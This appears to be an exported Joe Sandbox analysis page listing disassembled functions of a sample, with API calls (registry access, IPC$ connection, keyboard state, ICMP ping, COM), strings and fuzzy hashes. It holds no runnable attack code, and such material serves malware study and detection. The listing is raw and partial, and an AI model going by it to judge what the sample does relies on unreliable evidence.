Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 2156e6dab95dc5c70ba9e2fd449c6e6fa6efb6cdca77c593f57a307b2a55655c
Instruction ID: 0c017c3c925450e6086449b5906cfdd438faef52fff9802296cd533127536131
Opcode Fuzzy Hash: 2156e6dab95dc5c70ba9e2fd449c6e6fa6efb6cdca77c593f57a307b2a55655c
Instruction Fuzzy Hash: 05418131104644AFDB215FB89C85BFE3BB9AB06331F244659FAA6971E2DB319C42DB10

Function 00B096E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00AEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00B09717
LoadStringW.USER32(00000000,?,00AEF7F8,00000001), ref: 00B09720

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00AEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00B09742
LoadStringW.USER32(00000000,?,00AEF7F8,00000001), ref: 00B09745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00B09866

Strings

Error: , xrefs: 00B0981D
%s (%d) : ==> %s: %s %s, xrefs: 00B0984A
Line %d:, xrefs: 00B097A0
Line %d (File "%s"):, xrefs: 00B0978F
^ ERROR, xrefs: 00B097FB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 0b8b8c4a3dd6ace3c055d2b41c4ce2d42d7d66d9672c536f81ce5d1291799ea5
Instruction ID: 4139ed5cd460d3262e3aaf604147a6809ac7ab0b75eb8ad9298be75ca1cb2bf9
Opcode Fuzzy Hash: 0b8b8c4a3dd6ace3c055d2b41c4ce2d42d7d66d9672c536f81ce5d1291799ea5
Instruction Fuzzy Hash: C6410872800219AACF05EBE0CE86EEEB7B8AF56340F604065F505771D2EF256F48CB61

Function 00B006DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B007A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B007BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B007DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B00804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B0082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B00837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B0083C

Strings

\IPC$, xrefs: 00B00784
\CLSID, xrefs: 00B00724
SOFTWARE\Classes\, xrefs: 00B0070E

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: fc07668b800dea1318cfd2a8df17bd4426455825623cbaf869be8dcbc283386a
Instruction ID: 0d329d0fdb0e625a4cbc2ea10da6bbc89da128973738a71fad3dbbd6cbe19062
Opcode Fuzzy Hash: fc07668b800dea1318cfd2a8df17bd4426455825623cbaf869be8dcbc283386a
Instruction Fuzzy Hash: 9A41F872C10229ABDF15EFA4DD859EEBBB8FF14350F544169E901B71A1EB345E04CBA0

Function 00B23C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B23C5C
CoInitialize.OLE32(00000000), ref: 00B23C8A
CoUninitialize.OLE32 ref: 00B23C94
_wcslen.LIBCMT ref: 00B23D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00B23DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00B23ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00B23F0E
CoGetObject.OLE32(?,00000000,00B3FB98,?), ref: 00B23F2D
SetErrorMode.KERNEL32(00000000), ref: 00B23F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B23FC4
VariantClear.OLEAUT32(?), ref: 00B23FD8

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 79115baba27a021271bb2c53e8ed6a4f73855f70e2fe01951ed07e8cbd0d59d3
Instruction ID: 4241825de17bf51b2cdedf9fb8b71c111bfbcba3ed644f305fbca5924e040448
Opcode Fuzzy Hash: 79115baba27a021271bb2c53e8ed6a4f73855f70e2fe01951ed07e8cbd0d59d3
Instruction Fuzzy Hash: 65C168716083159FC700DF68D98492BBBE9FF89B44F1049ADF98A9B250DB34EE05CB52

Function 00B17A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B17AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B17B8F
SHGetDesktopFolder.SHELL32(?), ref: 00B17BA3
CoCreateInstance.OLE32(00B3FD08,00000000,00000001,00B66E6C,?), ref: 00B17BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B17C74
CoTaskMemFree.OLE32(?,?), ref: 00B17CCC
SHBrowseForFolderW.SHELL32(?), ref: 00B17D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B17D7A
CoTaskMemFree.OLE32(00000000), ref: 00B17D81
CoTaskMemFree.OLE32(00000000), ref: 00B17DD6
CoUninitialize.OLE32 ref: 00B17DDC

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 5b8402b1b16daa3b4715c874d5b2730e264783fa59b7538e3f7a3f1fb2a2e754
Instruction ID: d5b5dd0354e07b97d52a469ad5ee55c577082fadf399434b1f8e24749558dc1d
Opcode Fuzzy Hash: 5b8402b1b16daa3b4715c874d5b2730e264783fa59b7538e3f7a3f1fb2a2e754
Instruction Fuzzy Hash: 04C11C75A04109AFCB14DFA4D894DAEBBF9FF48314B1484A9E416DB361DB30EE81CB90

Function 00B3541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B35504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B35515
CharNextW.USER32(00000158), ref: 00B35544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B35585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B3559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B355AC

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: c0552a893833cae39d0648b51b11b82e01beb745cdc21e4a3a531e98fbaf2923
Instruction ID: c008b608e4153cbca7ccbb1d10288c2943ed8478218f9de43650e3649e45b911
Opcode Fuzzy Hash: c0552a893833cae39d0648b51b11b82e01beb745cdc21e4a3a531e98fbaf2923
Instruction Fuzzy Hash: 33617D71904608EFDF20DF94CC85AFE7BF9EB09721F204185F925AB291DB749A81DB60

Function 00AFFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AFFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 00AFFB08
VariantInit.OLEAUT32(?), ref: 00AFFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00AFFB3A
VariantCopy.OLEAUT32(?,?), ref: 00AFFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00AFFBA1
VariantClear.OLEAUT32(?), ref: 00AFFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 00AFFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AFFBCC
VariantClear.OLEAUT32(?), ref: 00AFFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AFFBE9

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9c0d882be65180f2c622fb02c002b73cdeac9e47b3b49ea3c978792474387cd6
Instruction ID: 0873df6aba09529039ea045da70713693a268488fb9f7f44e3b6363b81f4d0db
Opcode Fuzzy Hash: 9c0d882be65180f2c622fb02c002b73cdeac9e47b3b49ea3c978792474387cd6
Instruction Fuzzy Hash: 51412C35A00219AFDB10DFA8D8549BEBBB9FF48354F108069F956A7361DB30E945CBA0

Function 00B09C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B09CA1
GetAsyncKeyState.USER32(000000A0), ref: 00B09D22
GetKeyState.USER32(000000A0), ref: 00B09D3D
GetAsyncKeyState.USER32(000000A1), ref: 00B09D57
GetKeyState.USER32(000000A1), ref: 00B09D6C
GetAsyncKeyState.USER32(00000011), ref: 00B09D84
GetKeyState.USER32(00000011), ref: 00B09D96
GetAsyncKeyState.USER32(00000012), ref: 00B09DAE
GetKeyState.USER32(00000012), ref: 00B09DC0
GetAsyncKeyState.USER32(0000005B), ref: 00B09DD8
GetKeyState.USER32(0000005B), ref: 00B09DEA

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 90ebff0adedc83a53cc04a0868bfb9a75c81d2afd52b98cd30a9744e1554b292
Instruction ID: 44e36c53e1c1886a29d36523499e141d7cb878cf10cd77ff116bb1aabeaeed56
Opcode Fuzzy Hash: 90ebff0adedc83a53cc04a0868bfb9a75c81d2afd52b98cd30a9744e1554b292
Instruction Fuzzy Hash: 0541A8349447C969FF359664C8043B5BEE0EF11344F0481EADAC6575C3DBA59DC8C792

Function 00B2055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B205BC
inet_addr.WSOCK32(?), ref: 00B2061C
gethostbyname.WSOCK32(?), ref: 00B20628
IcmpCreateFile.IPHLPAPI ref: 00B20636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B206C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B206E5
IcmpCloseHandle.IPHLPAPI(?), ref: 00B207B9
WSACleanup.WSOCK32 ref: 00B207BF

Strings

Ping, xrefs: 00B20676

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: cf645f1d84fdc995920693403b8adf6953a5e68edb633704e238c728667231bc
Instruction ID: 8cf38cda3ecf98b7988d841ad342430bc6d59a26b650dad342f0b9c04ff0848c
Opcode Fuzzy Hash: cf645f1d84fdc995920693403b8adf6953a5e68edb633704e238c728667231bc
Instruction Fuzzy Hash: DE918D356182119FD320EF15D988F1ABBE0EF49318F1485A9F4699B6A3CB30ED45CF91

Function 00B28CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00B28CF3

Part of subcall function 00B08E54: _wcslen.LIBCMT ref: 00B08E77

_wcslen.LIBCMT ref: 00B28D4E
_wcslen.LIBCMT ref: 00B28D9C
_wcslen.LIBCMT ref: 00B28DDC
_wcslen.LIBCMT ref: 00B28E6E

Strings

cdecl, xrefs: 00B28D48, 00B28D4D
stdcall, xrefs: 00B28DD6, 00B28DDB
winapi, xrefs: 00B28D96, 00B28D9B
none, xrefs: 00B28E65, 00B28E6A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 9bb7cb0cbfb5988f71200afe2936ae657db64eb6d3b69a110082212a405b61f0
Instruction ID: 147591e9ae92f377a954fdf8f6541026d46c1be025b75ad190b51fe1e3a849d7
Opcode Fuzzy Hash: 9bb7cb0cbfb5988f71200afe2936ae657db64eb6d3b69a110082212a405b61f0
Instruction Fuzzy Hash: 4151C332A011269BCB14EF6CD9909BEB7E5FF65364B2142A9E42AE72C4DF34DD40C790

Function 00B2372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00B23774
CoUninitialize.OLE32 ref: 00B2377F
CoCreateInstance.OLE32(?,00000000,00000017,00B3FB78,?), ref: 00B237D9
IIDFromString.OLE32(?,?), ref: 00B2384C
VariantInit.OLEAUT32(?), ref: 00B238E4
VariantClear.OLEAUT32(?), ref: 00B23936

Strings

Failed to create object, xrefs: 00B237E4, 00B2389A
NULL Pointer assignment, xrefs: 00B2381E
Invalid parameter, xrefs: 00B23865

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 9592e98d22bd0cf00cf138878baf72870289af253a87cddb5fd41b8adae87de6
Instruction ID: 7cfc4cd6bf232c993c8a79c62dffd5db934eb5fb6ebcaf3537418567bb71e3bf
Opcode Fuzzy Hash: 9592e98d22bd0cf00cf138878baf72870289af253a87cddb5fd41b8adae87de6
Instruction Fuzzy Hash: EA61C370608311AFD710DF54D888F6EBBE8EF49B14F104889F5899B2A1D774EE48CB92

Function 00B13388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B133CF

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B133F0

Strings

Error: , xrefs: 00B134D1
^ ERROR , xrefs: 00B1349E
"%s" (%d) : ==> %s:, xrefs: 00B13522
Line %d (File "%s"):, xrefs: 00B13443, 00B1345C
"%s" (%d) : ==> %s:%s%s, xrefs: 00B13504
Incorrect parameters to object property !, xrefs: 00B134AB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 00da6a650813bd9ef8bb0926d79731dc3e52b5180a1b15af57aaf963d017369a
Instruction ID: 05253d418f275b21e94f836b8d27065ee057647b405310bc680147d48da5728e
Opcode Fuzzy Hash: 00da6a650813bd9ef8bb0926d79731dc3e52b5180a1b15af57aaf963d017369a
Instruction Fuzzy Hash: E6517D32900209AADF15EBA0CE42EEEB7B9EF15740F1440A5F405731A2EF252F98DB61

Function 00B0B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B0B5FC
_wcslen.LIBCMT ref: 00B0B608
_wcslen.LIBCMT ref: 00B0B64D
_wcslen.LIBCMT ref: 00B0B68C
_wcslen.LIBCMT ref: 00B0B6C7

Strings

KEYS, xrefs: 00B0B647, 00B0B64C
APPEND, xrefs: 00B0B6C1, 00B0B6C6
EXISTS, xrefs: 00B0B686, 00B0B68B
REMOVE, xrefs: 00B0B602, 00B0B607

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 848cf60a9244d687d6ac55120a113323ec4dd3578331237e67791018393c51ef
Instruction ID: 7808186bf861b1d33259ba05e571ae80a088ffc3b4f3219d6822ebf950d668c3
Opcode Fuzzy Hash: 848cf60a9244d687d6ac55120a113323ec4dd3578331237e67791018393c51ef
Instruction Fuzzy Hash: 0641A532A001279ACB205F7DC990DBEBFE5EB65B54B2542A9E421D72C4E736CD81C790

Function 00B15393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B153A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B15416
GetLastError.KERNEL32 ref: 00B15420
SetErrorMode.KERNEL32(00000000,READY), ref: 00B154A7

Strings

NOTREADY, xrefs: 00B1544B
UNKNOWN, xrefs: 00B15444
INVALID, xrefs: 00B15459
READY, xrefs: 00B15460, 00B15468
READONLY, xrefs: 00B15452

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 80cef1c4f5e22d4cc427060d6489264125ee65d56c39d30b3f114f59d07f7727
Instruction ID: 6392d5eee1b15aad717b57d33fe3eb11566819b8ebe4d8af1fe80ba6656bc61c
Opcode Fuzzy Hash: 80cef1c4f5e22d4cc427060d6489264125ee65d56c39d30b3f114f59d07f7727
Instruction Fuzzy Hash: 74316B35A00608DFD720DF68C984AEABBF4EB89305F5480A9E4059B396DB75DDC6CB90

Function 00B33C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00B33C79
SetMenu.USER32(?,00000000), ref: 00B33C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B33D10
IsMenu.USER32(?), ref: 00B33D24
CreatePopupMenu.USER32 ref: 00B33D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B33D5B
DrawMenuBar.USER32 ref: 00B33D63

Strings

0, xrefs: 00B33C54
F, xrefs: 00B33D4E

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: b0e77bdbf1b7e7bad5afe80fb031d12a0c1b2f0570d7dc902ee8a8f10b9afbf1
Instruction ID: 6fe8ad00208ae50ffb35635246b2cb8ffbd97fc364c551bdc76717f5f055fc24
Opcode Fuzzy Hash: b0e77bdbf1b7e7bad5afe80fb031d12a0c1b2f0570d7dc902ee8a8f10b9afbf1
Instruction Fuzzy Hash: 9B415979A01209EFDB14CFA4D884AAA7BF5FF49750F240069F956A7360DB30AA10CF94

Function 00B33A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B33A9D
